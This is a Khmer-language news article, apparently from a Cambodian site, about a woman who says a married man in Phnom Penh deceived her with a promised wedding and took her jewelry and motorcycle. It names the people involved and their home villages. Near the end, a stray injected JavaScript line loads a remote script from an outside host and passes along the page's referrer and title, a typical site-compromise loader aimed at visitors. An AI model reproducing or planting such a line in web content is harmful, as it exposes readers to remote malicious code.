Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ប្រុសព្រាន បោកទាំងប្រាណ បោកទាំងទ្រព្យសម្បត្តិ អោបកូនខ្ចីមកប្តឹងប៉ូលីស!

ភ្នំពេញ ៖ នារីម្នាក់រត់ទៅសុំការអន្តរាគមន៍ពីនគរបាលប៉ុស្តិ៍ចោមចៅ បន្ទាប់ចោទថានាងចាញ់ល្បិចប្រុសព្រាន បង់ទាំងខ្លួនអស់ទាំងទ្រព្យ ខាងប្រុសចង់ដោះដៃ ដឹងខ្លួនទាន់ ចាប់ឃាត់នាំចូលប៉ុស្តិ៍ប៉ូលីស ដើម្បីសាច់ញាតិមកនិយាយដោះស្រាយគ្នាឲ្យដឹងស ខ្មៅ បែកធ្លាយបុរសខាងលើ មានប្រពន្ធ កូនខ្ចី កាលពីវេលាម៉ោង៧និង៣០នាទីយប់ថ្ងៃទី២៧ ខែមករា ឆ្នាំ២០១៧ បង្កឲ្យភ្ញាក់ផ្អើល នៅព្រឹកថ្ងៃ ទី២៨ ខែមករា ក្រោយពីប្រពន្ធឱបកូនមកប៉ុស្តិ៍ប៉ូលីស ។

ភាគីខាងស្រីមានឈ្មោះ ឌី សុដាវណ្ណ អាយុ២៧ឆ្នាំ មុខរបរ កម្មកររោងចក្រ ស្នាក់នៅភូមិត្រាំងរំចេក សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍ សែន ជ័យ មានស្រុកកំណើតភូមិខ្នា ឃុំកក់ ស្រុកបសេដ្ឋ ខេត្តកំពង់ស្ពឺ ។ ចំណែក ភាគីខាងប្រុសមានឈ្មោះ អុឹម សុខជា អាយុ២៦ឆ្នាំ ជាមនុស្សពិការដៃឆ្វេង ស្វិតពីកំណើត មុខរបរ វិស្វករសំណង់សុីវិល ស្នាក់នៅភូមិទួលពង្រ មានស្រុកកំណើត ភូមិអន្លង់ឫស្សី ឃុំទ្រា ស្រុកល្វាឯម ខេត្តកណ្តាល មានប្រពន្ធឈ្មោះ សំ អាង អាយុ៣០ឆ្នាំ មានកូនស្រីម្នាក់ទើបបាន១ខែកន្លះ រស់នៅភូមិតាមុឺន ឃុំទួលអំពិល ស្រុកបសេដ្ឋ ខេត្តកំពង់ស្ពឺ ។ ដោយឡែក ម៉ូតតូដែល បុរសកំពូលល្បិច ឆបោកយកទៅបាត់នោះ ម៉ាក ស្កុបពី ពណ៌ស សេរី២០១៤ ពណ៌ស ពាក់ស្លាកលេខ កំពង់ធំ 1D-6955 ។

បើតាមសាច់ញាតិនារីរងគ្រោះ ជាកូនកំព្រា ឪពុកម្តាយ ស្លាប់ចោលអស់ហើយ បន្សល់ទុកកូនចំនួន៨នាក់ ប្រុស៣នាក់ ស្រី៥នាក់ នារីរងគ្រោះជាកូនទី៨ ពៅគេ ក្នុងគ្រួសារ កំព្រាគ្មានមេបា ក្រោយពីឪពុកម្តាយ ចាស់ៗស្លាប់ចោលអស់ ។
តាមនារីរងគ្រោះ បានឲ្យដឹងថា ខ្លួនបានស្រឡាញ់គ្នាជាមួយ បុរសខាងលើ អស់រយៈពេល៥ខែកន្លងមកហើយ ខណៈដែលបុរសខាងលើ ទៅធ្វើការងារសំណង់ នៅក្នុងភូមិទួលពង្រ សង្កាត់ចោមចៅ និងលេងហ្វេសហុក ឈានដល់បង្កើតស្នេហា សុំស្រឡាញ់ សុំស្នរហ៍ ដោយបុរសរូបនេះ ក៏បានសន្យា នឹងនាំចាស់ទុំចូលស្តីដណ្តឹង រៀបការត្រឹមត្រូវ តាមច្បាប់ ធ្វើឲ្យទន់ចិត្តទន់ថ្លើមប្រមាត់ ស្នេហារហូតដល់ ប្រគល់ខ្លួនប្រគល់ប្រាណ និងរួមរស់នៅជាមួយគ្នា ក្រោមដំបូលផ្ទះជួល អស់រយៈពេល២ខែ ។

នារីរងគ្រោះបន្តទៀតថា ហេតុតែនឹកស្លុងសម្តីជឿជាក់ សន្យារើសថ្ងៃរៀបការ យ៉ាងណាក៏ដោយ មុនក្រោយ ពួកគេទាំង២នាក់គង់ក្លាយជាប្តីប្រពន្ធ ខណៈដែលអង្កក្លាយជាបាយទៅហើយ។ ការលួងលោម សម្តីផ្អែម របស់ភាគីខាងប្រុស ធ្វើឲ្យនាងទុកចិត្ត អួតខ្លួនថានៅកម្លោះ ឪពុកម្តាយ នៅសហរដ្ឋអាមេរិច ហើយហ៊ានប្រគល់គ្រឿងអល័ង្កកា ឲ្យបុរសគូរស្នេហ៍ ទុកដាក់ របស់របរមួយចំនួន ត្រូវបានគូរស្នេហ៍ យកប្រើប្រាស់ បាត់បង់ ក៏មិនថាស្តី តែទីបំផុត ក្រោយពីសន្យា រើសយកថ្ងៃទី២៧ ខែមករា ឆ្នាំ២០១៧ និងរៀបការ ដ៏ឧត្តុង្គឧត្តម ខ្ពស់ នៅមជ្ឈមណ្ឌល ម៉ុងឌីយ៉ាល់ ហើយខាងស្រីហេតុតែលង់ស្នេហ៍ជឿជាក់ ក៏បានបានហៅភ្ញៀវ អញ្ជើញ ចូលរួមពិធីមង្គលការ ដែលប្រុសសន្យា នឹងរៀបចំនៅថ្ងៃទី២៧ ខែមករា ឆ្នាំ២០១៧ ។

ផ្ទុយទៅវិញ នៅថ្ងៃទី១៥ ខែមករា បករាប់ខាងស្រីថា ម្តាយឈឺ រហូតមកដល់ល្ងាចថ្ងៃទី២៥ ខែមករា កន្លងមក ខាងប្រុសក៏បានប្រាប់ទៀតថា ពិធីមង្គលការសុំផ្អាកសិន ក្នុងហេតុផល ម្តាយស្លាប់ ត្រូវដឹកតាមយន្តហោះពីសហរដ្ឋអាមេរិច មកស្រុកខ្មែរ តំកល់រៀបចំធ្វើបុណ្យនៅវត្ត ច្បារអំពៅ ខណ្ឌច្បារអំពៅ ក៏ប៉ុន្តែ សុំឲ្យពិធីមង្គលការ ទៅជាពិធីជប់លៀង ក្នុងមជ្ឈមណ្ឌលម៉ុងឌីយ៉ាល់ដដែល ។
គ្រាន់តែឮថា ម្តាយខាងប្រុស ស្តាប់ ធ្វើឲ្យ សាច់ញាតិខាងស្រី មានក្រីអាសូរ្យ នាំគ្នាផ្អើលទៅវត្តវិហារសួគ៌ តែផ្ទុយទៅវិញ មិនមានបុណ្យ ទាន បុណ្យសពអ្វីឡើយ ជាល្បិចភូតកុហក បោកប្រាស់ ទៅវិញ និយាយរកកន្លែងជឿមិនឃើញ រហូតដល់ថ្ងៃទី២៧ ខែមករា វេលាល្ងាចទៅហើយ ខណៈដែល ភ្ញៀវខាងស្រី ប្រមាណជិត២០នាក់ ផ្អើលនាំគ្នា ទៅចូលរួម ពិធីជប់លៀង ។

បន្ទាប់ពីប្តូរ ពីពិធីមង្គលការ ម្នាក់ៗ ក្នុងសម្លៀកបំពាក់ ស្រស់ស្អាតសង្ហារ ទាំងប្រុស ស្រី ចូលទៅពេញ ដើររក អាគារ ដែលប្រារព្វពិធី ក្នុងមជ្ឈមណ្ឌល ម៉ុងឌីយ៉ាល់ តែរកមិនឃើញ សាកសួរទៅ បុគ្គលិកប្រចាំការ ទីនោះ ទើបគេប្រាប់ថា ពុំមាន អ្នកណាមកជួល ប្រារព្វពិធីឡើយ សម្រាប់ថ្ងៃទី២៧ ខែមករា ព្រោះចំថ្ងៃសែនចូលឆ្នាំចិន ទើបធ្វើឲ្យភ្ញៀវម្នាក់ៗ មើលមុខគ្នាឡេងឡង ងឿងឆ្ងល់ ខកបំណង ខ្មាស់អស់ពលរដ្ឋអាជីវករ ក្នុងផ្សារឃ្លាំងរំសេវ ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More